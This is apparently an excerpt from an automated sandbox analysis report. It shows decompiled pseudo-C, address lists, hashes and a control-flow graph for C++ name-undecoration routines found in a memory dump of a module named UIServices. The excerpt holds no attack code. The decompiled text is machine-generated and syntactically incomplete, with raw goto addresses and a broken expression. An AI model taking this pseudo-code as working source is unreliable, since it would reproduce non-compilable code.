                                                    				if ( *((char*)(_t251 + 1)) != 0x5f) goto 0x2356bf6f;
                                                    				if ( *((char*)(_t251 + 2)) != 0x3f) goto 0x2356bf6f;
                                                    				_t63 = _t251 + 1; // 0x2
                                                    				_t192 = _t63;
                                                    				r8d = 0;
                                                    				 *0x23574360 = _t192;
                                                    				E00007FFC7FFC2356ABE0(0, __edi, _t294, _t270 + 0xa0, _t265, _t267, _t265, __r12);
                                                    				E00007FFC7FFC23566F74(_t192, _t270 + 0xb0, _t265);
                                                    				 *_t265 =  *_t192;
                                                    				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t192 + 8));
                                                    				_t193 =  *0x23574360; // 0x0
                                                    				if ( *_t193 != 0x40) goto 0x2356c084;
                                                    				 *0x23574360 =  *0x23574360 + 1;
                                                    				goto 0x2356c084;
                                                    				E00007FFC7FFC235698C8(__edi,  *_t193 - 0x40, _t193, _t294, _t270 + 0xc0, _t270 + 0xb0, _t265, _t267, _t265, _t290, _t294);
                                                    				 *((long long*)(_t270 - 0x80)) = _t294;
                                                    				 *((intOrPtr*)(_t270 - 0x78)) = r14d;
                                                    				E00007FFC7FFC23568150(0x60, _t193, _t193, _t270 - 0x80);
                                                    				E00007FFC7FFC23566F74(_t270 - 0x80, _t270, _t193);
                                                    				r8b = 0x27;
                                                    				E00007FFC7FFC23566FA0(_t270, _t270 + 0xd0);
                                                    				goto 0x2356c06d;
                                                    				r8b = 0x40;
                                                    				E00007FFC7FFC23566C44(_t193, _t193, _t270 - 0x70, 0x23574360, _t267, _t291);
                                                    				 *((intOrPtr*)(_t270 - 0x18)) = 0x15;
                                                    				 *((long long*)(_t270 - 0x20)) = "`anonymous namespace\'";
                                                    				asm("movaps xmm0, [ebp-0x20]");
                                                    				asm("movdqa [esp+0x40], xmm0");
                                                    				E00007FFC7FFC23566CF4("`anonymous namespace\'", _t270 + 0xf0, _t273 + 0x40);
                                                    				E00007FFC7FFC23566F74("`anonymous namespace\'", _t273 + 0x30, _t265);
                                                    				 *_t265 =  *((intOrPtr*)(_t273 + 0x30));
                                                    				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t273 + 0x38));
                                                    				_t233 =  *0x23574350; // 0x0
                                                    				if ( *_t233 == 9) goto 0x2356c084;
                                                    				_t259 = _t270 - 0x70;
                                                    				E00007FFC7FFC23567204( *((intOrPtr*)(_t273 + 0x30)), _t193, _t233, _t259);
                                                    				goto 0x2356c084;
                                                    				_t85 = _t259 - 1; // 0x0
                                                    				_t196 = _t85;
                                                    				r8d = 0;
                                                    				 *0x23574360 = _t196;
                                                    				E00007FFC7FFC2356DA5C(_t149,  *_t244 - 0xffffffffffffffff, 1, __edi, _t193, _t270 + 0x100, _t265, _t267, _t265, __r10, _t288);
                                                    				goto 0x2356c06d;
                                                    				r8d = 0;
                                                    				E00007FFC7FFC2356DA5C(_t149,  *_t244 - 0xffffffffffffffff, 1, __edi, _t193, _t270 + 0x20, _t265, _t267, _t265, __r10, _t288);
                                                    				E00007FFC7FFC23566F74(_t196, _t270 + 0x10, _t265);
                                                    				 *_t265 =  *_t196;
                                                    				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t196 + 8));
                                                    				if ( *((intOrPtr*)(_t265 + 8)) == r14b) goto 0x2356bcb9;
                                                    				_t197 =  *0x23574360; // 0x0
                                                    				if ( *_t197 == r14b) goto 0x2356c0ac;
                                                    				if ( *_t197 == 0x40) goto 0x2356c113;
                                                    				 *((intOrPtr*)(_t265 + 8)) = r14d;
                                                    				 *((char*)(_t265 + 8)) = 2;
                                                    				 *_t265 = _t294;
                                                    				goto 0x2356c113;
                                                    				if ( *_t265 != _t294) goto 0x2356c0c5;
                                                    				 *((intOrPtr*)(_t265 + 8)) = r14d;
                                                    				 *((char*)(_t265 + 8)) = 1;
                                                    				 *_t265 = 0x23571ac0;
                                                    				goto 0x2356c113;
                                                    				 *((long long*)(_t273 + 0x30)) = _t292;
                                                    				 *((intOrPtr*)(_t273 + 0x38)) = 2;
                                                    				asm("movaps xmm0, [esp+0x30]");
                                                    				asm("movdqa [ebp-0x70], xmm0");
                                                    				 *((intOrPtr*)(_t273 + 0x38)) = r14d;
                                                    				 *((long long*)(_t273 + 0x30)) = 0x23571ac0;
                                                    				E00007FFC7FFC23566F48(_t273 + 0x30, _t270 + 0x10, _t270 - 0x70);
                                                    				E00007FFC7FFC23566F74(0x23571ac0, _t270 + 0x20, _t265);
                                                    				 *_t265 =  *0x23571ac0;
                                                    				_t148 =  *0x7FFC23571AC8;
                                                    				 *((intOrPtr*)(_t265 + 8)) = _t148;
                                                    				return _t148;
                                                    			}
































                                                    0x7ffc2356bc80
                                                    0x7ffc2356bc80
                                                    0x7ffc2356bc80
                                                    0x7ffc2356bc80
                                                    0x7ffc2356bc80
                                                    0x7ffc2356bc83
                                                    0x7ffc2356bc87
                                                    0x7ffc2356bc8b
                                                    0x7ffc2356bc94
                                                    0x7ffc2356bc9b
                                                    0x7ffc2356bca2
                                                    0x7ffc2356bca5
                                                    0x7ffc2356bcac
                                                    0x7ffc2356bcaf
                                                    0x7ffc2356bcb2
                                                    0x7ffc2356bcb6
                                                    0x7ffc2356bcb9
                                                    0x7ffc2356bcc3
                                                    0x7ffc2356bcc9
                                                    0x7ffc2356bcd0
                                                    0x7ffc2356bcd2
                                                    0x7ffc2356bcd9
                                                    0x7ffc2356bce2
                                                    0x7ffc2356bce4
                                                    0x7ffc2356bced
                                                    0x7ffc2356bcf8
                                                    0x7ffc2356bcfc
                                                    0x7ffc2356bd02
                                                    0x7ffc2356bd11
                                                    0x7ffc2356bd1a
                                                    0x7ffc2356bd20
                                                    0x7ffc2356bd26
                                                    0x7ffc2356bd2a
                                                    0x7ffc2356bd34
                                                    0x7ffc2356bd39
                                                    0x7ffc2356bd4a
                                                    0x7ffc2356bd53
                                                    0x7ffc2356bd56
                                                    0x7ffc2356bd5c
                                                    0x7ffc2356bd5f
                                                    0x7ffc2356bd66
                                                    0x7ffc2356bd69
                                                    0x7ffc2356bd6f
                                                    0x7ffc2356bd6f
                                                    0x7ffc2356bd73
                                                    0x7ffc2356bd80
                                                    0x7ffc2356bd89
                                                    0x7ffc2356bd92
                                                    0x7ffc2356bd9b
                                                    0x7ffc2356bda4
                                                    0x7ffc2356bdad
                                                    0x7ffc2356bdb3
                                                    0x7ffc2356bdb8
                                                    0x7ffc2356bdbf
                                                    0x7ffc2356bdc4
                                                    0x7ffc2356bdc7
                                                    0x7ffc2356bdcc
                                                    0x7ffc2356bdcc
                                                    0x7ffc2356bdd0
                                                    0x7ffc2356bdd5
                                                    0x7ffc2356bddc
                                                    0x7ffc2356bde6
                                                    0x7ffc2356bdf1
                                                    0x7ffc2356bdf6
                                                    0x7ffc2356bdf8
                                                    0x7ffc2356be01
                                                    0x7ffc2356be0f
                                                    0x7ffc2356be18
                                                    0x7ffc2356be1e
                                                    0x7ffc2356be2f
                                                    0x7ffc2356be3a
                                                    0x7ffc2356be3e
                                                    0x7ffc2356be45
                                                    0x7ffc2356be47
                                                    0x7ffc2356be52
                                                    0x7ffc2356be5c
                                                    0x7ffc2356be5e
                                                    0x7ffc2356be68
                                                    0x7ffc2356be70
                                                    0x7ffc2356be7a
                                                    0x7ffc2356be7f
                                                    0x7ffc2356be92
                                                    0x7ffc2356be97
                                                    0x7ffc2356be9a
                                                    0x7ffc2356bea2
                                                    0x7ffc2356beaa
                                                    0x7ffc2356beb0
                                                    0x7ffc2356beb3
                                                    0x7ffc2356beb8
                                                    0x7ffc2356bebc
                                                    0x7ffc2356bec0
                                                    0x7ffc2356bec3
                                                    0x7ffc2356bec8
                                                    0x7ffc2356becc
                                                    0x7ffc2356bed1
                                                    0x7ffc2356bedc
                                                    0x7ffc2356bee1
                                                    0x7ffc2356beee
                                                    0x7ffc2356bef6
                                                    0x7ffc2356bf00
                                                    0x7ffc2356bf05
                                                    0x7ffc2356bf08
                                                    0x7ffc2356bf11
                                                    0x7ffc2356bf17
                                                    0x7ffc2356bf19
                                                    0x7ffc2356bf19
                                                    0x7ffc2356bf1d
                                                    0x7ffc2356bf22
                                                    0x7ffc2356bf30
                                                    0x7ffc2356bf42
                                                    0x7ffc2356bf4a
                                                    0x7ffc2356bf50
                                                    0x7ffc2356bf53
                                                    0x7ffc2356bf5d
                                                    0x7ffc2356bf63
                                                    0x7ffc2356bf6a
                                                    0x7ffc2356bf76
                                                    0x7ffc2356bf7d
                                                    0x7ffc2356bf85
                                                    0x7ffc2356bf8c
                                                    0x7ffc2356bf9c
                                                    0x7ffc2356bfa1
                                                    0x7ffc2356bfaf
                                                    0x7ffc2356bfbb
                                                    0x7ffc2356bfc0
                                                    0x7ffc2356bfce
                                                    0x7ffc2356bfda
                                                    0x7ffc2356bfe1
                                                    0x7ffc2356bfea
                                                    0x7ffc2356bff5
                                                    0x7ffc2356bffb
                                                    0x7ffc2356c00b
                                                    0x7ffc2356c015
                                                    0x7ffc2356c01c
                                                    0x7ffc2356c01f
                                                    0x7ffc2356c029
                                                    0x7ffc2356c02b
                                                    0x7ffc2356c02f
                                                    0x7ffc2356c034
                                                    0x7ffc2356c036
                                                    0x7ffc2356c036
                                                    0x7ffc2356c03a
                                                    0x7ffc2356c03f
                                                    0x7ffc2356c04d
                                                    0x7ffc2356c059
                                                    0x7ffc2356c05b
                                                    0x7ffc2356c064
                                                    0x7ffc2356c073
                                                    0x7ffc2356c07b
                                                    0x7ffc2356c081
                                                    0x7ffc2356c088
                                                    0x7ffc2356c08e
                                                    0x7ffc2356c098
                                                    0x7ffc2356c09d
                                                    0x7ffc2356c09f
                                                    0x7ffc2356c0a3
                                                    0x7ffc2356c0a7
                                                    0x7ffc2356c0aa
                                                    0x7ffc2356c0b6
                                                    0x7ffc2356c0b8
                                                    0x7ffc2356c0bc
                                                    0x7ffc2356c0c0
                                                    0x7ffc2356c0c3
                                                    0x7ffc2356c0c5
                                                    0x7ffc2356c0ce
                                                    0x7ffc2356c0da
                                                    0x7ffc2356c0e4
                                                    0x7ffc2356c0e9
                                                    0x7ffc2356c0ee
                                                    0x7ffc2356c0f3
                                                    0x7ffc2356c102
                                                    0x7ffc2356c10a
                                                    0x7ffc2356c10d
                                                    0x7ffc2356c110
                                                    0x7ffc2356c132

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: `anonymous namespace'
                                                    • API String ID: 2943138195-3062148218
                                                    • Opcode ID: ace1387cadf23985a6da4a59c4affd8786d881318c5283d2d6dca3bb4ae1bec8
                                                    • Instruction ID: fc16bafd0a5611767835827c2ca556bdc9e37fce95c45f0ca12bbe7a902e8350
                                                    • Opcode Fuzzy Hash: ace1387cadf23985a6da4a59c4affd8786d881318c5283d2d6dca3bb4ae1bec8
                                                    • Instruction Fuzzy Hash: F7E16C72E08B9A99EB10CF65E8801AD77B4FB44784F808176EB4D27B69DF38E554CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1006 7ffc2356a434-7ffc2356a46a 1007 7ffc2356a48f-7ffc2356a495 1006->1007 1008 7ffc2356a46c-7ffc2356a48a call 7ffc23566f74 1006->1008 1010 7ffc2356a4a0-7ffc2356a4b7 1007->1010 1011 7ffc2356a497-7ffc2356a49a 1007->1011 1019 7ffc2356a945-7ffc2356a968 1008->1019 1013 7ffc2356a4de-7ffc2356a4e0 1010->1013 1014 7ffc2356a4b9-7ffc2356a4bc 1010->1014 1011->1010 1012 7ffc2356a93a-7ffc2356a93e 1011->1012 1016 7ffc2356a942 1012->1016 1013->1012 1018 7ffc2356a4e6-7ffc2356a4ec 1013->1018 1014->1008 1017 7ffc2356a4be-7ffc2356a4dc 1014->1017 1016->1019 1020 7ffc2356a4f2-7ffc2356a4f5 1017->1020 1018->1012 1018->1020 1020->1012 1021 7ffc2356a4fb-7ffc2356a518 1020->1021 1022 7ffc2356a66e-7ffc2356a678 1021->1022 1023 7ffc2356a51e-7ffc2356a528 1021->1023 1024 7ffc2356a67e-7ffc2356a68e 1022->1024 1025 7ffc2356a73a-7ffc2356a74a 1022->1025 1026 7ffc2356a52e-7ffc2356a57e call 7ffc23566cf4 call 7ffc23566f74 1023->1026 1027 7ffc2356a5fc-7ffc2356a600 1023->1027 1028 7ffc2356a71d-7ffc2356a726 call 7ffc235687a0 1024->1028 1029 7ffc2356a694-7ffc2356a6da call 7ffc235687a0 call 7ffc23568150 call 7ffc23566f74 * 2 1024->1029 1031 7ffc2356a770-7ffc2356a779 call 7ffc23568ddc 1025->1031 1032 7ffc2356a74c-7ffc2356a76e call 7ffc23568ddc call 7ffc23566f74 1025->1032 1060 7ffc2356a580-7ffc2356a5ca call 7ffc2356bc80 call 7ffc23568150 call 7ffc23566f74 * 2 1026->1060 1061 7ffc2356a5cc-7ffc2356a5ec call 7ffc23566f74 1026->1061 1033 7ffc2356a607-7ffc2356a60a 1027->1033 1028->1025 1049 7ffc2356a728-7ffc2356a72c 1028->1049 1068 7ffc2356a737 1029->1068 1047 7ffc2356a78d-7ffc2356a790 1031->1047 1048 7ffc2356a77b-7ffc2356a77f 1031->1048 1032->1047 1039 7ffc2356a610-7ffc2356a613 1033->1039 1040 7ffc2356a708-7ffc2356a714 1033->1040 1039->1012 1046 7ffc2356a619-7ffc2356a641 1039->1046 1040->1028 1053 7ffc2356a6dc-7ffc2356a6f9 call 7ffc23568f1c 1046->1053 1054 7ffc2356a647-7ffc2356a668 call 7ffc23568f1c 1046->1054 1056 7ffc2356a792-7ffc2356a7d0 call 7ffc23568150 call 7ffc23566f74 call 7ffc23566fa0 1047->1056 1057 7ffc2356a7d3-7ffc2356a7ea call 7ffc2356aa78 1047->1057 1048->1047 1055 7ffc2356a781-7ffc2356a78a 1048->1055 1049->1025 1058 7ffc2356a72e-7ffc2356a735 1049->1058 1053->1022 1073 7ffc2356a6ff-7ffc2356a703 1053->1073 1074 7ffc2356a66b 1054->1074 1055->1047 1056->1057 1084 7ffc2356a7ec-7ffc2356a7f3 1057->1084 1085 7ffc2356a7f5 1057->1085 1058->1068 1082 7ffc2356a5f0-7ffc2356a5fa 1060->1082 1061->1082 1068->1025 1073->1074 1074->1022 1082->1033 1086 7ffc2356a7f8-7ffc2356a85c call 7ffc2356bc4c call 7ffc23568334 call 7ffc23568150 call 7ffc23566f74 call 7ffc23566fa0 call 7ffc23567078 1084->1086 1085->1086 1108 7ffc2356a85e-7ffc2356a861 1086->1108 1109 7ffc2356a876-7ffc2356a882 1086->1109 1108->1109 1112 7ffc2356a863-7ffc2356a870 call 7ffc23567078 1108->1112 1110 7ffc2356a897-7ffc2356a8a0 call 7ffc2356ba80 1109->1110 1111 7ffc2356a884-7ffc2356a895 call 7ffc2356ba80 call 7ffc23567078 1109->1111 1120 7ffc2356a8a2-7ffc2356a8a6 1110->1120 1121 7ffc2356a8b7-7ffc2356a8dd call 7ffc2356ab08 call 7ffc23567078 1110->1121 1111->1121 1112->1109 1120->1121 1123 7ffc2356a8a8-7ffc2356a8b4 1120->1123 1128 7ffc2356a911-7ffc2356a91a call 7ffc2356d0b0 1121->1128 1129 7ffc2356a8df-7ffc2356a8eb call 7ffc2356d0b0 call 7ffc23567078 1121->1129 1123->1121 1135 7ffc2356a8f0 1128->1135 1136 7ffc2356a91c-7ffc2356a920 1128->1136 1129->1135 1137 7ffc2356a8f3-7ffc2356a8f6 1135->1137 1136->1135 1138 7ffc2356a922-7ffc2356a92e 1136->1138 1139 7ffc2356a930-7ffc2356a938 1137->1139 1140 7ffc2356a8f8-7ffc2356a90f 1137->1140 1138->1137 1139->1016 1140->1019
                                                    C-Code - Quality: 88%
                                                    			E00007FFC7FFC2356A434(void* __ecx, void* __edi, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi) {
                                                    				void* __r12;
                                                    				signed int _t169;
                                                    				unsigned int _t173;
                                                    				unsigned int _t184;
                                                    				unsigned int _t212;
                                                    				signed int _t225;
                                                    				void* _t228;
                                                    				signed int _t229;
                                                    				unsigned int _t230;
                                                    				signed int _t250;
                                                    				void* _t259;
                                                    				void* _t285;
                                                    				intOrPtr* _t289;
                                                    				char* _t292;
                                                    				long long* _t294;
                                                    				long long _t296;
                                                    				intOrPtr* _t304;
                                                    				char* _t305;
                                                    				char* _t306;
                                                    				char* _t347;
                                                    				void* _t353;
                                                    				long long* _t370;
                                                    				long long* _t374;
                                                    				void* _t376;
                                                    				void* _t377;
                                                    				void* _t379;
                                                    				void* _t395;
                                                    				void* _t396;
                                                    				void* _t398;
                                                    				long long _t400;
                                                    				void* _t402;
                                                    				void* _t406;
                                                    				intOrPtr* _t407;
                                                    
                                                    				_t372 = __rsi;
                                                    				_t245 = __edi;
                                                    				_t228 = __ecx;
                                                    				_t285 = _t379;
                                                    				 *((long long*)(_t285 + 8)) = __rbx;
                                                    				 *((long long*)(_t285 + 0x10)) = __rsi;
                                                    				 *((long long*)(_t285 + 0x18)) = __rdi;
                                                    				_t377 = _t285 - 0x5f;
                                                    				_t370 = __rcx;
                                                    				r13d = 0;
                                                    				_t304 =  *0x23574360; // 0x0
                                                    				_t407 = __rdx;
                                                    				if ( *_t304 != r13b) goto 0x2356a48f;
                                                    				 *(_t377 - 0x11) = r13d;
                                                    				 *((long long*)(_t377 - 0x19)) = 0x23571ac0;
                                                    				_t305 = _t377 - 0x19;
                                                    				E00007FFC7FFC23566F74(_t305, __rcx, __rdx);
                                                    				goto 0x2356a945;
                                                    				if ( *_t305 - 0x36 - 3 <= 0) goto 0x2356a4a0;
                                                    				if ( *_t305 != 0x5f) goto 0x2356a93a;
                                                    				r8d = r8d | 0xffffffff;
                                                    				_t306 = _t305 + 1;
                                                    				 *0x23574360 = _t306;
                                                    				if ( *_t305 - 0x36 != 0x29) goto 0x2356a4de;
                                                    				if ( *_t306 == r13b) goto 0x2356a46c;
                                                    				_t8 = _t306 + 1; // 0x2
                                                    				_t347 = _t8;
                                                    				 *0x23574360 = _t347;
                                                    				_t250 =  >  ? r8d :  *_t306 - 0x3d;
                                                    				goto 0x2356a4f2;
                                                    				if (_t250 < 0) goto 0x2356a93a;
                                                    				if (_t250 - 3 > 0) goto 0x2356a93a;
                                                    				_t259 = _t250 - r8d;
                                                    				if (_t259 == 0) goto 0x2356a93a;
                                                    				r12d = _t250;
                                                    				 *((long long*)(_t377 - 0x29)) = _t400;
                                                    				 *(_t377 - 0x21) = r13d;
                                                    				 *((long long*)(_t377 - 0x39)) =  *_t407;
                                                    				 *(_t377 - 0x31) =  *(_t407 + 8);
                                                    				r12d = r12d & 0x00000002;
                                                    				if (_t259 == 0) goto 0x2356a66e;
                                                    				if ( *_t347 == 0x40) goto 0x2356a5fc;
                                                    				 *(_t377 - 0x11) = 2;
                                                    				 *((long long*)(_t377 - 0x19)) = "::";
                                                    				asm("movaps xmm0, [ebp-0x19]");
                                                    				asm("movdqa [ebp+0x7], xmm0");
                                                    				E00007FFC7FFC23566CF4("::", _t377 - 9, _t377 + 7);
                                                    				E00007FFC7FFC23566F74("::", _t377 - 0x19, _t377 - 0x39);
                                                    				 *((long long*)(_t377 - 0x39)) =  *((intOrPtr*)(_t377 - 0x19));
                                                    				 *(_t377 - 0x31) =  *(_t377 - 0x11);
                                                    				_t289 =  *0x23574360; // 0x0
                                                    				if ( *_t289 == r13b) goto 0x2356a5cc;
                                                    				E00007FFC7FFC2356BC80(__edi, __rbx, _t377 - 9, _t370, __rsi, _t395, _t396, _t398);
                                                    				 *((long long*)(_t377 - 0x19)) = _t400;
                                                    				 *(_t377 - 0x11) = r13d;
                                                    				E00007FFC7FFC23568150(0x20, _t289, _t289, _t377 - 0x19);
                                                    				E00007FFC7FFC23566F74(_t377 - 0x19, _t377 + 7, _t289);
                                                    				E00007FFC7FFC23566F74(_t377 + 7, _t377 + 0x27, _t377 - 0x39);
                                                    				 *((long long*)(_t377 - 0x39)) =  *_t289;
                                                    				goto 0x2356a5f0;
                                                    				 *(_t377 - 0x11) = r13d;
                                                    				_t353 = _t377 - 9;
                                                    				 *((long long*)(_t377 - 0x19)) = 0x23571ac0;
                                                    				E00007FFC7FFC23566F74(_t377 - 0x19, _t353, _t377 - 0x39);
                                                    				 *((long long*)(_t377 - 0x39)) =  *((intOrPtr*)(_t377 - 9));
                                                    				 *(_t377 - 0x31) =  *(_t377 - 1);
                                                    				goto 0x2356a607;
                                                    				_t45 = _t353 + 1; // 0x2
                                                    				_t292 = _t45;
                                                    				 *0x23574360 = _t292;
                                                    				if ( *_t292 == r13b) goto 0x2356a708;
                                                    				if ( *_t292 != 0x40) goto 0x2356a93a;
                                                    				 *((long long*)(_t377 - 9)) = _t400;
                                                    				 *0x23574360 = _t292 + 1;
                                                    				r8d = 0;
                                                    				_t169 =  *0x23574370; // 0x0
                                                    				 *(_t377 - 1) = r13d;
                                                    				 *((intOrPtr*)(_t379 - 0xa0 + 0x20)) = 1;
                                                    				if ((_t169 & 0x00000060) == 0x60) goto 0x2356a6dc;
                                                    				 *((long long*)(_t377 - 0x19)) = _t400;
                                                    				 *(_t377 - 0x11) = r13d;
                                                    				E00007FFC7FFC23568F1C(__edi, _t289, _t377 + 7, _t377 - 0x19, _t370, _t372, _t377 - 9);
                                                    				_t294 =  *((intOrPtr*)(_t377 + 7));
                                                    				 *((long long*)(_t377 - 0x29)) = _t294;
                                                    				 *(_t377 - 0x21) =  *(_t377 + 0xf);
                                                    				r14d = 0xffffff00;
                                                    				if ((sil & 0x00000004) == 0) goto 0x2356a73a;
                                                    				_t173 =  *0x23574370; // 0x0
                                                    				if (( !(_t173 >> 1) & 0x00000001) == 0) goto 0x2356a71d;
                                                    				E00007FFC7FFC235687A0(_t228, __edi,  !(_t173 >> 1) & 0x00000001, _t294, _t289, _t377 + 0x27, _t372, _t377 - 0x39, _t406);
                                                    				 *((long long*)(_t377 - 0x19)) = _t400;
                                                    				 *(_t377 - 0x11) = r13d;
                                                    				_t300 = _t294;
                                                    				E00007FFC7FFC23568150(0x20, _t294, _t294, _t377 - 0x19);
                                                    				E00007FFC7FFC23566F74(_t377 - 0x19, _t377 + 7, _t294);
                                                    				E00007FFC7FFC23566F74(_t377 + 7, _t377 - 9, _t377 - 0x39);
                                                    				 *((long long*)(_t377 - 0x39)) =  *_t294;
                                                    				goto 0x2356a737;
                                                    				 *((long long*)(_t377 + 7)) = _t400;
                                                    				 *(_t377 + 0xf) = r13d;
                                                    				E00007FFC7FFC23568F1C(__edi, _t294, _t377 - 0x19, _t377 - 9, _t370, _t372, _t377 + 7);
                                                    				if ( *(_t377 - 0x11) - 1 <= 0) goto 0x2356a66e;
                                                    				goto 0x2356a66b;
                                                    				 *(_t377 + 0xf) = r13d;
                                                    				 *((long long*)(_t377 + 7)) = 0x23571ac0;
                                                    				goto 0x2356a482;
                                                    				E00007FFC7FFC235687A0(_t228, __edi,  *(_t377 - 0x11) - 1, _t294, _t294, _t377 + 7, _t372, _t377 - 0x39, _t402);
                                                    				if ( *(_t377 - 0x31) == 3) goto 0x2356a73a;
                                                    				if ( *(_t294 + 8) - 1 <= 0) goto 0x2356a73a;
                                                    				_t225 =  *(_t294 + 8) & r14d |  *(_t294 + 8) & 0x000000ff;
                                                    				 *(_t377 - 0x31) = _t225;
                                                    				_t184 =  *0x23574370; // 0x0
                                                    				if (( !(_t184 >> 1) & 0x00000001) == 0) goto 0x2356a770;
                                                    				E00007FFC7FFC23568DDC(_t294, _t377 + 0x27, _t370, _t372, _t400, _t398);
                                                    				E00007FFC7FFC23566F74(_t294, _t377 + 7, _t377 - 0x39);
                                                    				 *((long long*)(_t377 - 0x39)) =  *_t294;
                                                    				 *(_t377 - 0x31) =  *(_t294 + 8);
                                                    				goto 0x2356a78d;
                                                    				E00007FFC7FFC23568DDC(_t294,  *_t294, _t370, _t372);
                                                    				if ( *(_t377 - 0x31) == 3) goto 0x2356a78d;
                                                    				if ( *(_t294 + 8) - 1 <= 0) goto 0x2356a78d;
                                                    				 *(_t377 - 0x31) = _t225 & r14d |  *(_t294 + 8) & 0x000000ff;
                                                    				if ( *_t407 == _t400) goto 0x2356a7d3;
                                                    				 *((long long*)(_t377 - 0x19)) = _t400;
                                                    				 *(_t377 - 0x11) = r13d;
                                                    				E00007FFC7FFC23568150(0x28, _t294, _t300, _t377 - 0x19);
                                                    				E00007FFC7FFC23566F74(_t377 - 0x19, _t377 + 7, _t377 - 0x39);
                                                    				r8b = 0x29;
                                                    				E00007FFC7FFC23566FA0(_t377 + 7, _t377 + 0x27);
                                                    				 *((long long*)(_t377 - 0x39)) =  *_t294;
                                                    				 *(_t377 - 0x31) =  *(_t294 + 8);
                                                    				E00007FFC7FFC2356AA78(_t294, _t300, 0x23574388, _t377 + 0x27, _t372, _t376);
                                                    				if (_t294 == 0) goto 0x2356a7f5;
                                                    				 *_t294 = _t400;
                                                    				 *(_t294 + 8) = r13d;
                                                    				goto 0x2356a7f8;
                                                    				_t374 = _t400;
                                                    				E00007FFC7FFC2356BC4C(_t245, _t377 + 0x17, _t370);
                                                    				E00007FFC7FFC23568334(_t300, _t377 + 0x27, _t374, _t374, _t377 - 0x39);
                                                    				 *((long long*)(_t377 - 0x19)) = _t400;
                                                    				 *(_t377 - 0x11) = r13d;
                                                    				_t301 = _t294;
                                                    				E00007FFC7FFC23568150(0x28, _t294, _t294, _t377 - 0x19);
                                                    				E00007FFC7FFC23566F74(_t377 - 0x19, _t377 + 7, _t301);
                                                    				r8b = 0x29;
                                                    				E00007FFC7FFC23566FA0(_t377 + 7, _t377 - 9);
                                                    				E00007FFC7FFC23567078(_t228, _t377 - 0x39, _t294, _t301);
                                                    				_t229 =  *0x23574370; // 0x0
                                                    				if ((_t229 & 0x00000060) == 0x60) goto 0x2356a876;
                                                    				if (r12d == 0) goto 0x2356a876;
                                                    				E00007FFC7FFC23567078(_t229, _t377 - 0x39, _t377 - 0x29, _t301);
                                                    				_t230 =  *0x23574370; // 0x0
                                                    				if (( !(_t230 >> 0x13) & 0x00000001) == 0) goto 0x2356a897;
                                                    				E00007FFC7FFC2356BA80(_t225 & r14d |  *(_t294 + 8) & 0x000000ff,  !(_t230 >> 0x13), _t245, _t301, _t377 + 0x27, _t370, _t374);
                                                    				E00007FFC7FFC23567078( !(_t230 >> 0x13), _t377 - 0x39, _t294, _t301);
                                                    				goto 0x2356a8b7;
                                                    				E00007FFC7FFC2356BA80(_t225 & r14d |  *(_t294 + 8) & 0x000000ff,  !(_t230 >> 0x13), _t245, _t301, _t377 - 0x39, _t370, _t374);
                                                    				if ( *(_t377 - 0x31) == 3) goto 0x2356a8b7;
                                                    				if ( *(_t294 + 8) - 1 <= 0) goto 0x2356a8b7;
                                                    				 *(_t377 - 0x31) =  *(_t377 - 0x31) & r14d |  *(_t294 + 8) & 0x000000ff;
                                                    				E00007FFC7FFC2356AB08(_t377 + 0x27);
                                                    				E00007FFC7FFC23567078( *(_t377 - 0x31) & r14d |  *(_t294 + 8) & 0x000000ff, _t377 - 0x39, _t294, _t301);
                                                    				_t212 =  *0x23574370; // 0x0
                                                    				if (( !(_t212 >> 8) & 0x00000001) == 0) goto 0x2356a911;
                                                    				E00007FFC7FFC2356D0B0(_t377 + 0x27);
                                                    				E00007FFC7FFC23567078( *(_t377 - 0x31) & r14d |  *(_t294 + 8) & 0x000000ff, _t377 - 0x39, _t294, _t301);
                                                    				if (_t374 == 0) goto 0x2356a930;
                                                    				 *_t374 =  *((intOrPtr*)(_t377 - 0x39));
                                                    				 *(_t374 + 8) =  *(_t377 - 0x31);
                                                    				_t296 =  *((intOrPtr*)(_t377 + 0x17));
                                                    				 *_t370 = _t296;
                                                    				 *(_t370 + 8) =  *(_t377 + 0x1f);
                                                    				goto 0x2356a945;
                                                    				E00007FFC7FFC2356D0B0(_t377 - 0x39);
                                                    				if ( *(_t377 - 0x31) == 3) goto 0x2356a8f0;
                                                    				if ( *(_t296 + 8) - 1 <= 0) goto 0x2356a8f0;
                                                    				goto 0x2356a8f3;
                                                    				 *(_t370 + 8) = r13d;
                                                    				 *(_t370 + 8) = 3;
                                                    				goto 0x2356a942;
                                                    				 *(_t370 + 8) = r13d;
                                                    				 *(_t370 + 8) = 2;
                                                    				 *_t370 = _t400;
                                                    				return  *(_t296 + 8) & 0x000000ff;
                                                    			}




































                                                    0x7ffc2356a434
                                                    0x7ffc2356a434
                                                    0x7ffc2356a434
                                                    0x7ffc2356a434
                                                    0x7ffc2356a437
                                                    0x7ffc2356a43b
                                                    0x7ffc2356a43f
                                                    0x7ffc2356a44c
                                                    0x7ffc2356a457
                                                    0x7ffc2356a45a
                                                    0x7ffc2356a45d
                                                    0x7ffc2356a464
                                                    0x7ffc2356a46a
                                                    0x7ffc2356a473
                                                    0x7ffc2356a477
                                                    0x7ffc2356a47b
                                                    0x7ffc2356a485
                                                    0x7ffc2356a48a
